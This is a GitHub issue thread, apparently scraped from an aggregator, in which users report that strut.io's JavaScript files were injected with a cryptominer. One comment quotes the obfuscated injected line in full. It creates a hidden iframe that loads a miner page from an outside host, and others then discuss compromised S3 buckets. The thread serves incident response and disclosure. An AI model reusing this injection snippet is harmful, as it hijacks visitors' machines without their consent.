strut.io has been injected with a coinminer script

cjmielke commented 6 years ago

Exporting presentations results in an archive containing several injected iframes, along with a script "ricewithchicken.js"

Eats all CPU, and is a known crypto miner

MohannadNaj commented 6 years ago

it's actually a one line injected into what appears to be each JS file, require.js, loadPresentation.js, swfobject.js, ...etc.

This is the content of the injected line:

var _0x75b214=["iframe","setAttribute","https://www.jqwww.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x75b214,367);var _0x48ae8e=function(t,x){var a=_0x75b214[t-=0];return a};a=document[_0x48ae8e("0x0")](_0x48ae8e("0x1")),a[_0x48ae8e("0x2")]("src",_0x48ae8e("0x3")),a.style.width="0px",a.style.height="1px",document[_0x48ae8e("0x4")][_0x48ae8e("0x5")](a);

I think we should email @tantaman about this. Since it's kinda urgent..

tantaman commented 6 years ago

o_O

Any idea how that could have happened?

engineers-tools commented 6 years ago

Someone has injected a script onto the *.vendor.js file of your strut.io website. Either someone hacked the file directly or has infected a CDN where you're pulling files from. The script injects an on your index file the first time it loads.</p> <p><img src="https://user-images.githubusercontent.com/20109071/38343229-37419830-38b5-11e8-9f18-0c1cb343aa5b.JPG" alt="capture" /></p> <p><img src="https://user-images.githubusercontent.com/20109071/38343286-8f170400-38b5-11e8-9fd8-2aa546975374.JPG" alt="capture" /></p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/cjmielke"><img src="https://avatars.githubusercontent.com/u/5335944?v=4" />cjmielke</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>My assumptions have been that the scripts were modified server-side, but I like the alternate theory of a CDN being compromised. Whatever it is, I imagine its a propagating mechanism that is broadly targeted, and not specific to strut.io.</p> <p>@tantaman the first step is to see if those files are modified on the server. Let us know.</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/thebouv"><img src="https://avatars.githubusercontent.com/u/3073072?v=4" />thebouv</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.</p> <p>I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).</p> <p>Just leaving note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/tantaman"><img src="https://avatars.githubusercontent.com/u/1009003?v=4" />tantaman</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>Yep, the whole site is hosted on s3. Was the solution for the other project to redeploy or did they literal have credentials to the bucket? On Thu, Apr 5, 2018 at 1:04 PM Anthony Bouvier <a href="mailto:notifications@github.com">notifications@github.com</a> wrote:</p> <blockquote> <p>Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.</p> <p>I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).</p> <p>Just leaving note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.</p> <p>— You are receiving this because you were mentioned.</p> <p>Reply to this email directly, view it on GitHub <a href="https://github.com/tantaman/Strut/issues/381#issuecomment-379006508">https://github.com/tantaman/Strut/issues/381#issuecomment-379006508</a>, or mute the thread <a href="https://github.com/notifications/unsubscribe-auth/AA9laymdRXZ0KHUR3Z2fSBW_ZehF4rKiks5tlk6AgaJpZM4TCvLh">https://github.com/notifications/unsubscribe-auth/AA9laymdRXZ0KHUR3Z2fSBW_ZehF4rKiks5tlk6AgaJpZM4TCvLh</a> .</p> </blockquote> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/thebouv"><img src="https://avatars.githubusercontent.com/u/3073072?v=4" />thebouv</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>They're in the midst of investigating now actually. I just told him I found it about 2 hours ago. I just happened to be surfing their website when the fan on my MacBook went nuts so I tracked it down to his site (open in a tab) and then started picking his files apart.</p> <p>Only his JS files and some images are in the S3 bucket, rest of his site isn't (as far as I know, but I'll double check with him).</p> <p>So what he's done for now is just kill those js files entirely -- they were only for fontawesome stuff. So he's using the fontawesome CDN now.</p> <p>But he looked at other JS files he had in same bucket and they too were compromised. I told him to check logs, look for suspicious logins, check read/write permissions on the files/bucket, etc.</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/refi64"><img src="https://avatars.githubusercontent.com/u/1690697?v=4" />refi64</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>While this is up for discussion, as a random thought: couldn't Strut technically be hosted on GitHub pages, since it's entirely client-side? </p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/cjmielke"><img src="https://avatars.githubusercontent.com/u/5335944?v=4" />cjmielke</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>I've notified my contacts at Amazon. Wonder if they could grep the whole system ;)</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/thebouv"><img src="https://avatars.githubusercontent.com/u/3073072?v=4" />thebouv</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>Another repo potentially related as it mentions AWS as well. Last comment says something about their CDN permissions being set public -- not sure if that has anything to do with it, I'm not a big AWS user. </p> <p><a href="https://github.com/uBlockOrigin/uAssets/issues/1698">https://github.com/uBlockOrigin/uAssets/issues/1698</a></p> <p>But figured I'd share if it helps your investigation.</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/cjmielke"><img src="https://avatars.githubusercontent.com/u/5335944?v=4" />cjmielke</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>I've personally never used S3 before, so this exercise has been rather educational ...</p> <p><a href="https://www.tripwire.com/state-of-security/security-data-protection/cloud/public-aws-s3-buckets-writable/">https://www.tripwire.com/state-of-security/security-data-protection/cloud/public-aws-s3-buckets-writable/</a></p> <p>I'm really shocked that this is a problem, and that it hasn't been used for things far more nefarious!</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/jaens"><img src="https://avatars.githubusercontent.com/u/639345?v=4" />jaens</a> commented <strong> 6 years ago</strong> </div> <div class="markdown-body"> <p>Still compromised... :fire:</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/tantaman"><img src="https://avatars.githubusercontent.com/u/1009003?v=4" />tantaman</a> commented <strong> 5 years ago</strong> </div> <div class="markdown-body"> <p>This has been resolved as of today.</p> <p><a href="http://strut.io/editor">http://strut.io/editor</a></p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/smalltimebloke"><img src="https://avatars.githubusercontent.com/u/17269831?v=4" />smalltimebloke</a> commented <strong> 4 years ago</strong> </div> <div class="markdown-body"> <p>Hi there. The problem isn't resolved yet</p> </div> </div> <div class="comment"> <div class="user"> <a rel="noreferrer nofollow" target="_blank" href="https://github.com/ejvindh"><img src="https://avatars.githubusercontent.com/u/650533?v=4" />ejvindh</a> commented <strong> 4 years ago</strong> </div> <div class="markdown-body"> <p><a href="https://github.com/tantaman/Strut/issues/387#issuecomment-579218930">https://github.com/tantaman/Strut/issues/387#issuecomment-579218930</a></p> </div> </div> <div class="page-bar-simple"> </div> <div class="footer"> <ul class="body"> <li>© <script> document.write(new Date().getFullYear()) </script> Githubissues.</li> <li>Githubissues is a development platform for aggregating issues.</li> </ul> </div> <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script> <script src="/githubissues/assets/js.js"></script> <script src="/githubissues/assets/markdown.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.4.0/build/highlight.min.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.4.0/build/languages/go.min.js"></script> <script> hljs.highlightAll(); </script> </body> </html>

tantaman / strut

strut.io has been injected with a coinminer script #381